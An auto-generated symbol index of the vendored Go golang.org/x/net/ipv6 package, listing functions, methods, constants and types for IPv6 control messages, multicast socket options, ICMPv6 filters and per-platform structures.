vendor/golang.org/x/net/ipv6/control_rfc3542_unix.go function marshalTrafficClass (line 19) | func marshalTrafficClass(b []byte, cm *ControlMessage) []byte { function parseTrafficClass (line 28) | func parseTrafficClass(cm *ControlMessage, b []byte) { function marshalHopLimit (line 32) | func marshalHopLimit(b []byte, cm *ControlMessage) []byte { function parseHopLimit (line 41) | func parseHopLimit(cm *ControlMessage, b []byte) { function marshalPacketInfo (line 45) | func marshalPacketInfo(b []byte, cm *ControlMessage) []byte { function parsePacketInfo (line 60) | func parsePacketInfo(cm *ControlMessage, b []byte) { function marshalNextHop (line 69) | func marshalNextHop(b []byte, cm *ControlMessage) []byte { function parseNextHop (line 79) | func parseNextHop(cm *ControlMessage, b []byte) { function marshalPathMTU (line 82) | func marshalPathMTU(b []byte, cm *ControlMessage) []byte { function parsePathMTU (line 88) | func parsePathMTU(cm *ControlMessage, b []byte) { FILE: vendor/golang.org/x/net/ipv6/control_stub.go function setControlMessage (line 11) | func setControlMessage(c *socket.Conn, opt *rawOpt, cf ControlFlags, on ... FILE: vendor/golang.org/x/net/ipv6/control_unix.go function setControlMessage (line 11) | func setControlMessage(c *socket.Conn, opt *rawOpt, cf ControlFlags, on ... FILE: vendor/golang.org/x/net/ipv6/control_windows.go function setControlMessage (line 9) | func setControlMessage(c *socket.Conn, opt *rawOpt, cf ControlFlags, on ... FILE: vendor/golang.org/x/net/ipv6/dgramopt.go method MulticastHopLimit (line 15) | func (c *dgramOpt) MulticastHopLimit() (int, error) { method SetMulticastHopLimit (line 28) | func (c *dgramOpt) SetMulticastHopLimit(hoplim int) error { method MulticastInterface (line 41) | func (c *dgramOpt) MulticastInterface() (*net.Interface, error) { method SetMulticastInterface (line 54) | func (c *dgramOpt) SetMulticastInterface(ifi *net.Interface) error { method MulticastLoopback (line 67) | func (c *dgramOpt) MulticastLoopback() (bool, error) { method SetMulticastLoopback (line 84) | func (c *dgramOpt) SetMulticastLoopback(on bool) error { method JoinGroup (line 104) | func (c *dgramOpt) JoinGroup(ifi *net.Interface, group net.Addr) error { method LeaveGroup (line 122) | func (c *dgramOpt) LeaveGroup(ifi *net.Interface, group net.Addr) error { method JoinSourceSpecificGroup (line 143) | func (c *dgramOpt) JoinSourceSpecificGroup(ifi *net.Interface, group, so... method LeaveSourceSpecificGroup (line 164) | func (c *dgramOpt) LeaveSourceSpecificGroup(ifi *net.Interface, group, s... method ExcludeSourceSpecificGroup (line 186) | func (c *dgramOpt) ExcludeSourceSpecificGroup(ifi *net.Interface, group,... method IncludeSourceSpecificGroup (line 207) | func (c *dgramOpt) IncludeSourceSpecificGroup(ifi *net.Interface, group,... method Checksum (line 230) | func (c *dgramOpt) Checksum() (on bool, offset int, err error) { method SetChecksum (line 251) | func (c *dgramOpt) SetChecksum(on bool, offset int) error { method ICMPFilter (line 266) | func (c *dgramOpt) ICMPFilter() (*ICMPFilter, error) { method SetICMPFilter (line 278) | func (c *dgramOpt) SetICMPFilter(f *ICMPFilter) error { method SetBPF (line 292) | func (c *dgramOpt) SetBPF(filter []bpf.RawInstruction) error { FILE: vendor/golang.org/x/net/ipv6/endpoint.go type Conn (line 22) | type Conn struct method PathMTU (line 34) | func (c *Conn) PathMTU() (int, error) { type genericOpt (line 26) | type genericOpt struct method ok (line 30) | func (c *genericOpt) ok() bool { return c != nil && c.Conn != nil } function NewConn (line 50) | func NewConn(c net.Conn) *Conn { type PacketConn (line 62) | type PacketConn struct method SetControlMessage (line 76) | func (c *PacketConn) SetControlMessage(cf ControlFlags, on bool) error { method SetDeadline (line 85) | func (c *PacketConn) SetDeadline(t time.Time) error { method SetReadDeadline (line 94) | func (c *PacketConn) SetReadDeadline(t time.Time) error { method SetWriteDeadline (line 103) | func (c *PacketConn) SetWriteDeadline(t time.Time) error { method Close (line 111) | func (c *PacketConn) Close() error { type dgramOpt (line 68) | type dgramOpt struct method ok (line 72) | func (c *dgramOpt) ok() bool { return c != nil && c.Conn != nil } function NewPacketConn (line 120) | func NewPacketConn(c net.PacketConn) *PacketConn { FILE: vendor/golang.org/x/net/ipv6/genericopt.go method TrafficClass (line 9) | func (c *genericOpt) TrafficClass() (int, error) { method SetTrafficClass (line 22) | func (c *genericOpt) SetTrafficClass(tclass int) error { method HopLimit (line 34) | func (c *genericOpt) HopLimit() (int, error) { method SetHopLimit (line 47) | func (c *genericOpt) SetHopLimit(hoplim int) error { FILE: vendor/golang.org/x/net/ipv6/header.go constant Version (line 14) | Version = 6 constant HeaderLen (line 15) | HeaderLen = 40 type Header (line 19) | type Header struct method String (line 30) | func (h *Header) String() string { function ParseHeader (line 38) | func ParseHeader(b []byte) (*Header, error) { FILE: vendor/golang.org/x/net/ipv6/helper.go function boolint (line 21) | func boolint(b bool) int { function netAddrToIP16 (line 28) | func netAddrToIP16(a net.Addr) net.IP { function opAddr (line 42) | func opAddr(a net.Addr) net.Addr { FILE: vendor/golang.org/x/net/ipv6/iana.go constant ICMPTypeDestinationUnreachable (line 8) | ICMPTypeDestinationUnreachable ICMPType = 1 constant ICMPTypePacketTooBig (line 9) | ICMPTypePacketTooBig ICMPType = 2 constant ICMPTypeTimeExceeded (line 10) | ICMPTypeTimeExceeded ICMPType = 3 constant ICMPTypeParameterProblem (line 11) | ICMPTypeParameterProblem ICMPType = 4 constant ICMPTypeEchoRequest (line 12) | ICMPTypeEchoRequest ICMPType = 128 constant ICMPTypeEchoReply (line 13) | ICMPTypeEchoReply ICMPType = 129 constant ICMPTypeMulticastListenerQuery (line 14) | ICMPTypeMulticastListenerQuery ICMPType = 130 constant ICMPTypeMulticastListenerReport (line 15) | ICMPTypeMulticastListenerReport ICMPType = 131 constant ICMPTypeMulticastListenerDone (line 16) | ICMPTypeMulticastListenerDone ICMPType = 132 constant ICMPTypeRouterSolicitation (line 17) | ICMPTypeRouterSolicitation ICMPType = 133 constant ICMPTypeRouterAdvertisement (line 18) | ICMPTypeRouterAdvertisement ICMPType = 134 constant ICMPTypeNeighborSolicitation (line 19) | ICMPTypeNeighborSolicitation ICMPType = 135 constant ICMPTypeNeighborAdvertisement (line 20) | ICMPTypeNeighborAdvertisement ICMPType = 136 constant ICMPTypeRedirect (line 21) | ICMPTypeRedirect ICMPType = 137 constant ICMPTypeRouterRenumbering (line 22) | ICMPTypeRouterRenumbering ICMPType = 138 constant ICMPTypeNodeInformationQuery (line 23) | ICMPTypeNodeInformationQuery ICMPType = 139 constant ICMPTypeNodeInformationResponse (line 24) | ICMPTypeNodeInformationResponse ICMPType = 140 constant ICMPTypeInverseNeighborDiscoverySolicitation (line 25) | ICMPTypeInverseNeighborDiscoverySolicitation ICMPType = 141 constant ICMPTypeInverseNeighborDiscoveryAdvertisement (line 26) | ICMPTypeInverseNeighborDiscoveryAdvertisement ICMPType = 142 constant ICMPTypeVersion2MulticastListenerReport (line 27) | ICMPTypeVersion2MulticastListenerReport ICMPType = 143 constant ICMPTypeHomeAgentAddressDiscoveryRequest (line 28) | ICMPTypeHomeAgentAddressDiscoveryRequest ICMPType = 144 constant ICMPTypeHomeAgentAddressDiscoveryReply (line 29) | ICMPTypeHomeAgentAddressDiscoveryReply ICMPType = 145 constant ICMPTypeMobilePrefixSolicitation (line 30) | ICMPTypeMobilePrefixSolicitation ICMPType = 146 constant ICMPTypeMobilePrefixAdvertisement (line 31) | ICMPTypeMobilePrefixAdvertisement ICMPType = 147 constant ICMPTypeCertificationPathSolicitation (line 32) | ICMPTypeCertificationPathSolicitation ICMPType = 148 constant ICMPTypeCertificationPathAdvertisement (line 33) | ICMPTypeCertificationPathAdvertisement ICMPType = 149 constant ICMPTypeMulticastRouterAdvertisement (line 34) | ICMPTypeMulticastRouterAdvertisement ICMPType = 151 constant ICMPTypeMulticastRouterSolicitation (line 35) | ICMPTypeMulticastRouterSolicitation ICMPType = 152 constant ICMPTypeMulticastRouterTermination (line 36) | ICMPTypeMulticastRouterTermination ICMPType = 153 constant ICMPTypeFMIPv6 (line 37) | ICMPTypeFMIPv6 ICMPType = 154 constant ICMPTypeRPLControl (line 38) | ICMPTypeRPLControl ICMPType = 155 constant ICMPTypeILNPv6LocatorUpdate (line 39) | ICMPTypeILNPv6LocatorUpdate ICMPType = 156 constant ICMPTypeDuplicateAddressRequest (line 40) | ICMPTypeDuplicateAddressRequest ICMPType = 157 constant ICMPTypeDuplicateAddressConfirmation (line 41) | ICMPTypeDuplicateAddressConfirmation ICMPType = 158 constant ICMPTypeMPLControl (line 42) | ICMPTypeMPLControl ICMPType = 159 constant ICMPTypeExtendedEchoRequest (line 43) | ICMPTypeExtendedEchoRequest ICMPType = 160 constant ICMPTypeExtendedEchoReply (line 44) | ICMPTypeExtendedEchoReply ICMPType = 161 FILE: vendor/golang.org/x/net/ipv6/icmp.go type ICMPType (line 13) | type ICMPType method String (line 15) | func (typ ICMPType) String() string { method Protocol (line 24) | func (typ ICMPType) Protocol() int { type ICMPFilter (line 36) | type ICMPFilter struct method Accept (line 42) | func (f *ICMPFilter) Accept(typ ICMPType) { method Block (line 48) | func (f *ICMPFilter) Block(typ ICMPType) { method SetAll (line 53) | func (f *ICMPFilter) SetAll(block bool) { method WillBlock (line 58) | func (f *ICMPFilter) WillBlock(typ ICMPType) bool { FILE: vendor/golang.org/x/net/ipv6/icmp_bsd.go method accept (line 9) | func (f *icmpv6Filter) accept(typ ICMPType) { method block (line 13) | func (f *icmpv6Filter) block(typ ICMPType) { method setAll (line 17) | func (f *icmpv6Filter) setAll(block bool) { method willBlock (line 27) | func (f *icmpv6Filter) willBlock(typ ICMPType) bool { FILE: vendor/golang.org/x/net/ipv6/icmp_linux.go method accept (line 7) | func (f *icmpv6Filter) accept(typ ICMPType) { method block (line 11) | func (f *icmpv6Filter) block(typ ICMPType) { method setAll (line 15) | func (f *icmpv6Filter) setAll(block bool) { method willBlock (line 25) | func (f *icmpv6Filter) willBlock(typ ICMPType) bool { FILE: vendor/golang.org/x/net/ipv6/icmp_solaris.go method accept (line 7) | func (f *icmpv6Filter) accept(typ ICMPType) { method block (line 11) | func (f *icmpv6Filter) block(typ ICMPType) { method setAll (line 15) | func (f *icmpv6Filter) setAll(block bool) { method willBlock (line 25) | func (f *icmpv6Filter) willBlock(typ ICMPType) bool { FILE: vendor/golang.org/x/net/ipv6/icmp_stub.go type icmpv6Filter (line 9) | type icmpv6Filter struct method accept (line 12) | func (f *icmpv6Filter) accept(typ ICMPType) { method block (line 15) | func (f *icmpv6Filter) block(typ ICMPType) { method setAll (line 18) | func (f *icmpv6Filter) setAll(block bool) { method willBlock (line 21) | func (f *icmpv6Filter) willBlock(typ ICMPType) bool { FILE: vendor/golang.org/x/net/ipv6/icmp_windows.go method accept (line 7) | func (f *icmpv6Filter) accept(typ ICMPType) { method block (line 11) | func (f *icmpv6Filter) block(typ ICMPType) { method setAll (line 15) | func (f *icmpv6Filter) setAll(block bool) { method willBlock (line 19) | func (f *icmpv6Filter) willBlock(typ ICMPType) bool { FILE: vendor/golang.org/x/net/ipv6/icmp_zos.go method accept (line 7) | func (f *icmpv6Filter) accept(typ ICMPType) { method block (line 12) | func (f *icmpv6Filter) block(typ ICMPType) { method setAll (line 17) | func (f *icmpv6Filter) setAll(block bool) { method willBlock (line 27) | func (f *icmpv6Filter) willBlock(typ ICMPType) bool { FILE: vendor/golang.org/x/net/ipv6/payload.go type payloadHandler (line 17) | type payloadHandler struct method ok (line 23) | func (c *payloadHandler) ok() bool { return c != nil && c.PacketConn !... FILE: vendor/golang.org/x/net/ipv6/payload_cmsg.go method ReadFrom (line 19) | func (c *payloadHandler) ReadFrom(b []byte) (n int, cm *ControlMessage, ... method WriteTo (line 56) | func (c *payloadHandler) WriteTo(b []byte, cm *ControlMessage, dst net.A... FILE: vendor/golang.org/x/net/ipv6/payload_nocmsg.go method ReadFrom (line 15) | func (c *payloadHandler) ReadFrom(b []byte) (n int, cm *ControlMessage, ... method WriteTo (line 30) | func (c *payloadHandler) WriteTo(b []byte, cm *ControlMessage, dst net.A... FILE: vendor/golang.org/x/net/ipv6/sockopt.go constant ssoTrafficClass (line 11) | ssoTrafficClass = iota constant ssoHopLimit (line 12) | ssoHopLimit constant ssoMulticastInterface (line 13) | ssoMulticastInterface constant ssoMulticastHopLimit (line 14) | ssoMulticastHopLimit constant ssoMulticastLoopback (line 15) | ssoMulticastLoopback constant ssoReceiveTrafficClass (line 16) | ssoReceiveTrafficClass constant ssoReceiveHopLimit (line 17) | ssoReceiveHopLimit constant ssoReceivePacketInfo (line 18) | ssoReceivePacketInfo constant ssoReceivePathMTU (line 19) | ssoReceivePathMTU constant ssoPathMTU (line 20) | ssoPathMTU constant ssoChecksum (line 21) | ssoChecksum constant ssoICMPFilter (line 22) | ssoICMPFilter constant ssoJoinGroup (line 23) | ssoJoinGroup constant ssoLeaveGroup (line 24) | ssoLeaveGroup constant ssoJoinSourceGroup (line 25) | ssoJoinSourceGroup constant ssoLeaveSourceGroup (line 26) | ssoLeaveSourceGroup constant ssoBlockSourceGroup (line 27) | ssoBlockSourceGroup constant ssoUnblockSourceGroup (line 28) | ssoUnblockSourceGroup constant ssoAttachFilter (line 29) | ssoAttachFilter constant ssoTypeIPMreq (line 34) | ssoTypeIPMreq = iota + 1 constant ssoTypeGroupReq (line 35) | ssoTypeGroupReq constant ssoTypeGroupSourceReq (line 36) | ssoTypeGroupSourceReq type sockOpt (line 40) | type sockOpt struct FILE: vendor/golang.org/x/net/ipv6/sockopt_posix.go method getMulticastInterface (line 18) | func (so *sockOpt) getMulticastInterface(c *socket.Conn) (*net.Interface... method setMulticastInterface (line 26) | func (so *sockOpt) setMulticastInterface(c *socket.Conn, ifi *net.Interf... method getICMPFilter (line 34) | func (so *sockOpt) getICMPFilter(c *socket.Conn) (*ICMPFilter, error) { method setICMPFilter (line 46) | func (so *sockOpt) setICMPFilter(c *socket.Conn, f *ICMPFilter) error { method getMTUInfo (line 51) | func (so *sockOpt) getMTUInfo(c *socket.Conn) (*net.Interface, int, erro... method setGroup (line 72) | func (so *sockOpt) setGroup(c *socket.Conn, ifi *net.Interface, grp net.... method setSourceGroup (line 83) | func (so *sockOpt) setSourceGroup(c *socket.Conn, ifi *net.Interface, gr... method setBPF (line 87) | func (so *sockOpt) setBPF(c *socket.Conn, f []bpf.RawInstruction) error { FILE: vendor/golang.org/x/net/ipv6/sockopt_stub.go method getMulticastInterface (line 16) | func (so *sockOpt) getMulticastInterface(c *socket.Conn) (*net.Interface... method setMulticastInterface (line 20) | func (so *sockOpt) setMulticastInterface(c *socket.Conn, ifi *net.Interf... method getICMPFilter (line 24) | func (so *sockOpt) getICMPFilter(c *socket.Conn) (*ICMPFilter, error) { method setICMPFilter (line 28) | func (so *sockOpt) setICMPFilter(c *socket.Conn, f *ICMPFilter) error { method getMTUInfo (line 32) | func (so *sockOpt) getMTUInfo(c *socket.Conn) (*net.Interface, int, erro... method setGroup (line 36) | func (so *sockOpt) setGroup(c *socket.Conn, ifi *net.Interface, grp net.... method setSourceGroup (line 40) | func (so *sockOpt) setSourceGroup(c *socket.Conn, ifi *net.Interface, gr... method setBPF (line 44) | func (so *sockOpt) setBPF(c *socket.Conn, f []bpf.RawInstruction) error { FILE: vendor/golang.org/x/net/ipv6/sys_aix.go method setSockaddr (line 48) | func (sa *sockaddrInet6) setSockaddr(ip net.IP, i int) { method setIfindex (line 55) | func (pi *inet6Pktinfo) setIfindex(i int) { method setIfindex (line 59) | func (mreq *ipv6Mreq) setIfindex(i int) { method setGroup (line 63) | func (gr *groupReq) setGroup(grp net.IP) { method setSourceGroup (line 70) | func (gsr *groupSourceReq) setSourceGroup(grp, src net.IP) { FILE: vendor/golang.org/x/net/ipv6/sys_asmreq.go method setIPMreq (line 16) | func (so *sockOpt) setIPMreq(c *socket.Conn, ifi *net.Interface, grp net... FILE: vendor/golang.org/x/net/ipv6/sys_asmreq_stub.go method setIPMreq (line 15) | func (so *sockOpt) setIPMreq(c *socket.Conn, ifi *net.Interface, grp net... FILE: vendor/golang.org/x/net/ipv6/sys_bpf.go method setAttachFilter (line 17) | func (so *sockOpt) setAttachFilter(c *socket.Conn, f []bpf.RawInstructio... FILE: vendor/golang.org/x/net/ipv6/sys_bpf_stub.go method setAttachFilter (line 14) | func (so *sockOpt) setAttachFilter(c *socket.Conn, f []bpf.RawInstructio... FILE: vendor/golang.org/x/net/ipv6/sys_bsd.go method setSockaddr (line 46) | func (sa *sockaddrInet6) setSockaddr(ip net.IP, i int) { method setIfindex (line 53) | func (pi *inet6Pktinfo) setIfindex(i int) { method setIfindex (line 57) | func (mreq *ipv6Mreq) setIfindex(i int) { FILE: vendor/golang.org/x/net/ipv6/sys_darwin.go method setSockaddr (line 49) | func (sa *sockaddrInet6) setSockaddr(ip net.IP, i int) { method setIfindex (line 56) | func (pi *inet6Pktinfo) setIfindex(i int) { method setIfindex (line 60) | func (mreq *ipv6Mreq) setIfindex(i int) { method setGroup (line 64) | func (gr *groupReq) setGroup(grp net.IP) { method setSourceGroup (line 71) | func (gsr *groupSourceReq) setSourceGroup(grp, src net.IP) { FILE: vendor/golang.org/x/net/ipv6/sys_freebsd.go function init (line 51) | func init() { method setSockaddr (line 63) | func (sa *sockaddrInet6) setSockaddr(ip net.IP, i int) { method setIfindex (line 70) | func (pi *inet6Pktinfo) setIfindex(i int) { method setIfindex (line 74) | func (mreq *ipv6Mreq) setIfindex(i int) { method setGroup (line 78) | func (gr *groupReq) setGroup(grp net.IP) { method setSourceGroup (line 85) | func (gsr *groupSourceReq) setSourceGroup(grp, src net.IP) { FILE: vendor/golang.org/x/net/ipv6/sys_linux.go method setSockaddr (line 49) | func (sa *sockaddrInet6) setSockaddr(ip net.IP, i int) { method setIfindex (line 55) | func (pi *inet6Pktinfo) setIfindex(i int) { method setIfindex (line 59) | func (mreq *ipv6Mreq) setIfindex(i int) { method setGroup (line 63) | func (gr *groupReq) setGroup(grp net.IP) { method setSourceGroup (line 69) | func (gsr *groupSourceReq) setSourceGroup(grp, src net.IP) { FILE: vendor/golang.org/x/net/ipv6/sys_solaris.go method setSockaddr (line 49) | func (sa *sockaddrInet6) setSockaddr(ip net.IP, i int) { method setIfindex (line 55) | func (pi *inet6Pktinfo) setIfindex(i int) { method setIfindex (line 59) | func (mreq *ipv6Mreq) setIfindex(i int) { method setGroup (line 63) | func (gr *groupReq) setGroup(grp net.IP) { method setSourceGroup (line 69) | func (gsr *groupSourceReq) setSourceGroup(grp, src net.IP) { FILE: vendor/golang.org/x/net/ipv6/sys_ssmreq.go method setGroupReq (line 18) | func (so *sockOpt) setGroupReq(c *socket.Conn, ifi *net.Interface, grp n... method setGroupSourceReq (line 37) | func (so *sockOpt) setGroupSourceReq(c *socket.Conn, ifi *net.Interface,... FILE: vendor/golang.org/x/net/ipv6/sys_ssmreq_stub.go method setGroupReq (line 15) | func (so *sockOpt) setGroupReq(c *socket.Conn, ifi *net.Interface, grp n... method setGroupSourceReq (line 19) | func (so *sockOpt) setGroupSourceReq(c *socket.Conn, ifi *net.Interface,... FILE: vendor/golang.org/x/net/ipv6/sys_windows.go constant sizeofSockaddrInet6 (line 18) | sizeofSockaddrInet6 = 0x1c constant sizeofIPv6Mreq (line 20) | sizeofIPv6Mreq = 0x14 constant sizeofIPv6Mtuinfo (line 21) | sizeofIPv6Mtuinfo = 0x20 constant sizeofICMPv6Filter (line 22) | sizeofICMPv6Filter = 0 type sockaddrInet6 (line 25) | type sockaddrInet6 struct method setSockaddr (line 60) | func (sa *sockaddrInet6) setSockaddr(ip net.IP, i int) { type ipv6Mreq (line 33) | type ipv6Mreq struct method setIfindex (line 66) | func (mreq *ipv6Mreq) setIfindex(i int) { type ipv6Mtuinfo (line 38) | type ipv6Mtuinfo struct type icmpv6Filter (line 43) | type icmpv6Filter struct FILE: vendor/golang.org/x/net/ipv6/sys_zos.go method setSockaddr (line 46) | func (sa *sockaddrInet6) setSockaddr(ip net.IP, i int) { method setIfindex (line 52) | func (pi *inet6Pktinfo) setIfindex(i int) { method setGroup (line 56) | func (gr *groupReq) setGroup(grp net.IP) { method setSourceGroup (line 63) | func (gsr *groupSourceReq) setSourceGroup(grp, src net.IP) { FILE: vendor/golang.org/x/net/ipv6/zsys_aix_ppc64.go constant sizeofSockaddrStorage (line 10) | sizeofSockaddrStorage = 0x508 constant sizeofSockaddrInet6 (line 11) | sizeofSockaddrInet6 = 0x1c constant sizeofInet6Pktinfo (line 12) | sizeofInet6Pktinfo = 0x14 constant sizeofIPv6Mtuinfo (line 13) | sizeofIPv6Mtuinfo = 0x20 constant sizeofIPv6Mreq (line 15) | sizeofIPv6Mreq = 0x14 constant sizeofGroupReq (line 16) | sizeofGroupReq = 0x510 constant sizeofGroupSourceReq (line 17) | sizeofGroupSourceReq = 0xa18 constant sizeofICMPv6Filter (line 19) | sizeofICMPv6Filter = 0x20 type sockaddrStorage (line 22) | type sockaddrStorage struct type sockaddrInet6 (line 31) | type sockaddrInet6 struct type inet6Pktinfo (line 40) | type inet6Pktinfo struct type ipv6Mtuinfo (line 45) | type ipv6Mtuinfo struct type ipv6Mreq (line 50) | type ipv6Mreq struct type icmpv6Filter (line 55) | type icmpv6Filter struct type groupReq (line 59) | type groupReq struct type groupSourceReq (line 64) | type groupSourceReq struct FILE: vendor/golang.org/x/net/ipv6/zsys_darwin.go constant sizeofSockaddrStorage (line 7) | sizeofSockaddrStorage = 0x80 constant sizeofSockaddrInet6 (line 8) | sizeofSockaddrInet6 = 0x1c constant sizeofInet6Pktinfo (line 9) | sizeofInet6Pktinfo = 0x14 constant sizeofIPv6Mtuinfo (line 10) | sizeofIPv6Mtuinfo = 0x20 constant sizeofIPv6Mreq (line 12) | sizeofIPv6Mreq = 0x14 constant sizeofGroupReq (line 13) | sizeofGroupReq = 0x84 constant sizeofGroupSourceReq (line 14) | sizeofGroupSourceReq = 0x104 constant sizeofICMPv6Filter (line 16) | sizeofICMPv6Filter = 0x20 type sockaddrStorage (line 19) | type sockaddrStorage struct type sockaddrInet6 (line 27) | type sockaddrInet6 struct type inet6Pktinfo (line 36) | type inet6Pktinfo struct type ipv6Mtuinfo (line 41) | type ipv6Mtuinfo struct type ipv6Mreq (line 46) | type ipv6Mreq struct type icmpv6Filter (line 51) | type icmpv6Filter struct type groupReq (line 55) | type groupReq struct type groupSourceReq (line 60) | type groupSourceReq struct FILE: vendor/golang.org/x/net/ipv6/zsys_dragonfly.go constant sizeofSockaddrInet6 (line 7) | sizeofSockaddrInet6 = 0x1c constant sizeofInet6Pktinfo (line 8) | sizeofInet6Pktinfo = 0x14 constant sizeofIPv6Mtuinfo (line 9) | sizeofIPv6Mtuinfo = 0x20 constant sizeofIPv6Mreq (line 11) | sizeofIPv6Mreq = 0x14 constant sizeofICMPv6Filter (line 13) | sizeofICMPv6Filter = 0x20 type sockaddrInet6 (line 16) | type sockaddrInet6 struct type inet6Pktinfo (line 25) | type inet6Pktinfo struct type ipv6Mtuinfo (line 30) | type ipv6Mtuinfo struct type ipv6Mreq (line 35) | type ipv6Mreq struct type icmpv6Filter (line 40) | type icmpv6Filter struct FILE: vendor/golang.org/x/net/ipv6/zsys_freebsd_386.go constant sizeofSockaddrStorage (line 7) | sizeofSockaddrStorage = 0x80 constant sizeofSockaddrInet6 (line 8) | sizeofSockaddrInet6 = 0x1c constant sizeofInet6Pktinfo (line 9) | sizeofInet6Pktinfo = 0x14 constant sizeofIPv6Mtuinfo (line 10) | sizeofIPv6Mtuinfo = 0x20 constant sizeofIPv6Mreq (line 12) | sizeofIPv6Mreq = 0x14 constant sizeofGroupReq (line 13) | sizeofGroupReq = 0x84 constant sizeofGroupSourceReq (line 14) | sizeofGroupSourceReq = 0x104 constant sizeofICMPv6Filter (line 16) | sizeofICMPv6Filter = 0x20 type sockaddrStorage (line 19) | type sockaddrStorage struct type sockaddrInet6 (line 27) | type sockaddrInet6 struct type inet6Pktinfo (line 36) | type inet6Pktinfo struct type ipv6Mtuinfo (line 41) | type ipv6Mtuinfo struct type ipv6Mreq (line 46) | type ipv6Mreq struct type groupReq (line 51) | type groupReq struct type groupSourceReq (line 56) | type groupSourceReq struct type icmpv6Filter (line 62) | type icmpv6Filter struct FILE: vendor/golang.org/x/net/ipv6/zsys_freebsd_amd64.go constant sizeofSockaddrStorage (line 7) | sizeofSockaddrStorage = 0x80 constant sizeofSockaddrInet6 (line 8) | sizeofSockaddrInet6 = 0x1c constant sizeofInet6Pktinfo (line 9) | sizeofInet6Pktinfo = 0x14 constant sizeofIPv6Mtuinfo (line 10) | sizeofIPv6Mtuinfo = 0x20 constant sizeofIPv6Mreq (line 12) | sizeofIPv6Mreq = 0x14 constant sizeofGroupReq (line 13) | sizeofGroupReq = 0x88 constant sizeofGroupSourceReq (line 14) | sizeofGroupSourceReq = 0x108 constant sizeofICMPv6Filter (line 16) | sizeofICMPv6Filter = 0x20 type sockaddrStorage (line 19) | type sockaddrStorage struct type sockaddrInet6 (line 27) | type sockaddrInet6 struct type inet6Pktinfo (line 36) | type inet6Pktinfo struct type ipv6Mtuinfo (line 41) | type ipv6Mtuinfo struct type ipv6Mreq (line 46) | type ipv6Mreq struct type groupReq (line 51) | type groupReq struct type groupSourceReq (line 57) | type groupSourceReq struct type icmpv6Filter (line 64) | type icmpv6Filter struct FILE: vendor/golang.org/x/net/ipv6/zsys_freebsd_arm.go constant sizeofSockaddrStorage (line 7) | sizeofSockaddrStorage = 0x80 constant sizeofSockaddrInet6 (line 8) | sizeofSockaddrInet6 = 0x1c constant sizeofInet6Pktinfo (line 9) | sizeofInet6Pktinfo = 0x14 constant sizeofIPv6Mtuinfo (line 10) | sizeofIPv6Mtuinfo = 0x20 constant sizeofIPv6Mreq (line 12) | sizeofIPv6Mreq = 0x14 constant sizeofGroupReq (line 13) | sizeofGroupReq = 0x88 constant sizeofGroupSourceReq (line 14) | sizeofGroupSourceReq = 0x108 constant sizeofICMPv6Filter (line 16) | sizeofICMPv6Filter = 0x20 type sockaddrStorage (line 19) | type sockaddrStorage struct type sockaddrInet6 (line 27) | type sockaddrInet6 struct type inet6Pktinfo (line 36) | type inet6Pktinfo struct type ipv6Mtuinfo (line 41) | type ipv6Mtuinfo struct type ipv6Mreq (line 46) | type ipv6Mreq struct type groupReq (line 51) | type groupReq struct type groupSourceReq (line 57) | type groupSourceReq struct type icmpv6Filter (line 64) | type icmpv6Filter struct FILE: vendor/golang.org/x/net/ipv6/zsys_freebsd_arm64.go constant sizeofSockaddrStorage (line 7) | sizeofSockaddrStorage = 0x80 constant sizeofSockaddrInet6 (line 8) | sizeofSockaddrInet6 = 0x1c constant sizeofInet6Pktinfo (line 9) | sizeofInet6Pktinfo = 0x14 constant sizeofIPv6Mtuinfo (line 10) | sizeofIPv6Mtuinfo = 0x20 constant sizeofIPv6Mreq (line 12) | sizeofIPv6Mreq = 0x14 constant sizeofGroupReq (line 13) | sizeofGroupReq = 0x88 constant sizeofGroupSourceReq (line 14) | sizeofGroupSourceReq = 0x108 constant sizeofICMPv6Filter (line 16) | sizeofICMPv6Filter = 0x20 type sockaddrStorage (line 19) | type sockaddrStorage struct type sockaddrInet6 (line 27) | type sockaddrInet6 struct type inet6Pktinfo (line 36) | type inet6Pktinfo struct type ipv6Mtuinfo (line 41) | type ipv6Mtuinfo struct type ipv6Mreq (line 46) | type ipv6Mreq struct type groupReq (line 51) | type groupReq struct type groupSourceReq (line 56) | type groupSourceReq struct type icmpv6Filter (line 62) | type icmpv6Filter struct FILE: vendor/golang.org/x/net/ipv6/zsys_freebsd_riscv64.go constant sizeofSockaddrStorage (line 7) | sizeofSockaddrStorage = 0x80 constant sizeofSockaddrInet6 (line 8) | sizeofSockaddrInet6 = 0x1c constant sizeofInet6Pktinfo (line 9) | sizeofInet6Pktinfo = 0x14 constant sizeofIPv6Mtuinfo (line 10) | sizeofIPv6Mtuinfo = 0x20 constant sizeofIPv6Mreq (line 12) | sizeofIPv6Mreq = 0x14 constant sizeofGroupReq (line 13) | sizeofGroupReq = 0x88 constant sizeofGroupSourceReq (line 14) | sizeofGroupSourceReq = 0x108 constant sizeofICMPv6Filter (line 16) | sizeofICMPv6Filter = 0x20 type sockaddrStorage (line 19) | type sockaddrStorage struct type sockaddrInet6 (line 27) | type sockaddrInet6 struct type inet6Pktinfo (line 36) | type inet6Pktinfo struct type ipv6Mtuinfo (line 41) | type ipv6Mtuinfo struct type ipv6Mreq (line 46) | type ipv6Mreq struct type groupReq (line 51) | type groupReq struct type groupSourceReq (line 56) | type groupSourceReq struct type icmpv6Filter (line 62) | type icmpv6Filter struct FILE: vendor/golang.org/x/net/ipv6/zsys_linux_386.go constant sizeofKernelSockaddrStorage (line 7) | sizeofKernelSockaddrStorage = 0x80 constant sizeofSockaddrInet6 (line 8) | sizeofSockaddrInet6 = 0x1c constant sizeofInet6Pktinfo (line 9) | sizeofInet6Pktinfo = 0x14 constant sizeofIPv6Mtuinfo (line 10) | sizeofIPv6Mtuinfo = 0x20 constant sizeofIPv6FlowlabelReq (line 11) | sizeofIPv6FlowlabelReq = 0x20 constant sizeofIPv6Mreq (line 13) | sizeofIPv6Mreq = 0x14 constant sizeofGroupReq (line 14) | sizeofGroupReq = 0x84 constant sizeofGroupSourceReq (line 15) | sizeofGroupSourceReq = 0x104 constant sizeofICMPv6Filter (line 17) | sizeofICMPv6Filter = 0x20 type kernelSockaddrStorage (line 20) | type kernelSockaddrStorage struct type sockaddrInet6 (line 25) | type sockaddrInet6 struct type inet6Pktinfo (line 33) | type inet6Pktinfo struct type ipv6Mtuinfo (line 38) | type ipv6Mtuinfo struct type ipv6FlowlabelReq (line 43) | type ipv6FlowlabelReq struct type ipv6Mreq (line 54) | type ipv6Mreq struct type groupReq (line 59) | type groupReq struct type groupSourceReq (line 64) | type groupSourceReq struct type icmpv6Filter (line 70) | 